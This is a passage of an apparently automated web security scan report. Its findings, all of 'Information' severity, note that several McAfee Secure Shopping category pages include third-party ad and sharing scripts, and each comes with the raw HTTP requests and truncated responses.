Date: Sat, 25 Dec 2010 03:49:17 GMT
Content-Length: 57770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Headphones at McAfee Secure Shopping - Search, Discover & Co
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.123. http://secureshopping.mcafee.com/browse/computers/accessories/microphones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/microphones/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/microphones/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:17 GMT
Content-Length: 42764

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Microphones at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.124. http://secureshopping.mcafee.com/browse/computers/accessories/monitor-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/monitor-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/monitor-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:18 GMT
Content-Length: 57067

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Monitor Accessories at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.125. http://secureshopping.mcafee.com/browse/computers/accessories/mp3-player-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/mp3-player-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/mp3-player-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:21 GMT
Content-Length: 65062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View MP3 Player Accessories at McAfee Secure Shopping - Search, Disco
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.126. http://secureshopping.mcafee.com/browse/computers/accessories/notebook-pda-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/notebook-pda-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/notebook-pda-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:23 GMT
Content-Length: 55242

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Notebook & PDA Accessories at McAfee Secure Shopping - Searc
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.127. http://secureshopping.mcafee.com/browse/computers/accessories/paper-supplies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/paper-supplies/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/paper-supplies/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:23 GMT
Content-Length: 49574

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Paper Supplies at McAfee Secure Shopping - Search, Discover &amp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.128. http://secureshopping.mcafee.com/browse/computers/accessories/printer-supplies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/printer-supplies/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/printer-supplies/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:24 GMT
Content-Length: 59019

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Printer Supplies at McAfee Secure Shopping - Search, Discover &a
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.129. http://secureshopping.mcafee.com/browse/computers/accessories/racks,-mounts-cabinets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/racks,-mounts-cabinets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/racks,-mounts-cabinets/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:29 GMT
Content-Length: 56947

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Racks, Mounts & Cabinets at McAfee Secure Shopping - Search,
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.130. http://secureshopping.mcafee.com/browse/computers/accessories/remote-controls/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/remote-controls/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/remote-controls/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:33 GMT
Content-Length: 52650

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Remote Controls at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.131. http://secureshopping.mcafee.com/browse/computers/accessories/scanner-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/scanner-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/scanner-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:34 GMT
Content-Length: 54229

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Scanner Accessories at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.132. http://secureshopping.mcafee.com/browse/computers/accessories/storage-media/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/storage-media/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/storage-media/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
